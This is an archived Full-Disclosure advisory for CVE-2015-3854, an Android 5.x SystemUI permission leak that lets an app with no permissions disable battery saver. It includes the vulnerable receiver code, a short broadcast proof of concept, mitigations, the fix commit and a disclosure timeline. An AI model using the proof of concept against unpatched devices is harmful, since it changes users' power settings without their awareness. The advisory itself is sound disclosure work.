lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Date: Thu, 26 May 2016 15:58:49 +0800
From: "flanker" <i@...nker017.me>
To: "fulldisclosure" <fulldisclosure@...lists.org>
Subject: Re: [FD] CVE-2015-3854 Battery permission leakage in Android

The Credit of this vulnerability is to 
Qidan He (@flanker_hqd) from KeenLab(http://keenlab.tencent.com), Tencent.

------------------
Sincerely
Qidan (a.k.a Flanker)
 

 
------------------ Original ------------------
From:  "flanker"<i@...nker017.me>;
Date:  Thu, May 26, 2016 03:27 PM
To:  "fulldisclosure"<fulldisclosure@...lists.org>; 

Subject:  CVE-2015-3854 Battery permission leakage in Android

 
Hi: I'm posting some vulnerabilities I reported to Android and fixed last year prior to the Android Security Bounty program launch. Since there're no public bulletins for these ancient reports, I'm writing to the maillist for the record.  Details ======= A permission leakage exists in Android 5.x that enables a malicious application to acquire the system-level protected permission of DEVICE_POWER. There exists a permission leakage in packages/SystemUI/src/com/android/systemui/power/PowerNotificationWarnings.java, An attacker app without any permission can turn off battery save mode (which should be guarded by DEVICE_POWER permission, which is a system permission, lead to permission leakage), dismiss low battery notification. ##Analysis The PowerNotificationWarnings registered a dynamic receiver without permission guard, listening for the following actions:  - PNW.batterySettings  - PNW.startSaver  - PNW.stopSaver  - PNW.dismissedWarning   The PNW.stopSaver will call setSaverMode(fals
 e), thus call mPowerMan.setPowerSaveMode(false), which finally calls PowerManager.setPowerSaveMode(false).  ```java (code of PowerNotificationWarnings.java)  private final class Receiver extends BroadcastReceiver {         public void init() {             IntentFilter filter = new IntentFilter();             filter.addAction(ACTION_SHOW_BATTERY_SETTINGS);             filter.addAction(ACTION_START_SAVER);             filter.addAction(ACTION_STOP_SAVER);             filter.addAction(ACTION_DISMISSED_WARNING);             mContext.registerReceiverAsUser(this, UserHandle.ALL, filter, null, mHandler);         }  @Override         public void onReceive(Context context, Intent intent) {             final String action = intent.getAction();             Slog.i(TAG, "Received " + action);             if (action.equals(ACTION_SHOW_BATTERY_SETTINGS)) {                 dismissLowBatteryNotification();                 mContext.startActivityAsUser(mOpenBatterySettings, UserHandle.CURRENT);        
      } else if (action.equals(ACTION_START_SAVER)) {                 dismissLowBatteryNotification();                 showStartSaverConfirmation();             } else if (action.equals(ACTION_STOP_SAVER)) {                 dismissSaverNotification();                 dismissLowBatteryNotification();                 setSaverMode(false);//PERMISSION LEAK HERE!             } else if (action.equals(ACTION_DISMISSED_WARNING)) {                 dismissLowBatteryWarning();             }         } ``` An ordinary app cannot directly call this method because this API call is guarded by system permission DEVICE_POWER, however by sending a broadcast with action "PNW.stopSaver",  it can trigger this API call on behave of SystemUI, thus stops battery saver without user action and awareness. Tested on Nexus 6/Nexus 7  (5.1.1) ##POC code(do not require any permission)         Intent intent = new Intent();         intent.setAction("PNW.stopSaver");         sendBroadcast(intent);          ##Possible 
 mitigations Use a local broadcast mechanism, or use permission to guide the dynamic receiver. ##Official fixes: fixed in https://android.googlesource.com/platform/frameworks/base/+/05e0705177d2078fa9f940ce6df723312cfab976 ##Report timeline 2015.5.6 Initial report to security@...roid.com 2015.5.8 Android Security Team acks and assigned ANDROID-20918350 2015.6.1 The bug is fixed in Android internal branch  2015.7.24 CVE Requested, assigned CVE-2015-3854 2016.5.26 Public Disclosure ------------------ Sincerely Qidan (a.k.a Flanker)

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ